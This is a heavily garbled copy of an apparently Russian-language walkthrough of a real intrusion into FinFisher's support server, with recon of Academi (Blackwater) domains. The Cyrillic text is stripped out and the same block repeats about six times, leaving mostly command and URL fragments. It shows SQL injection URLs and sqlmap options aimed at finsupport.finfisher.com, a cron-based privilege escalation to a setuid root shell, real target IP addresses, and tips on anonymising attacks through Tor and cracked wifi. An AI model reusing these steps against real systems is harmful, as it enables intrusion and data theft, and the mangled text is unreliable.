54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus
WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell
chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/
http://overthewire.org/wargames/
http://www.hackthissite.org/
http://smashthestack.org/
http://www.win.tue.nl/~aeb/linux/hh/hh.html
http://www.phrack.com/
http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot
http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash
https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/
https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( )
https://www.corelan.be/ ( Exploit writing tutorial part 1)
http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/
http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook
Hacking: The Art of Exploitation
The Database Hacker's Handbook
The Art of Software Security Assessment
A Bug Hunter's Diary
Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier
TCP/IP Illustrated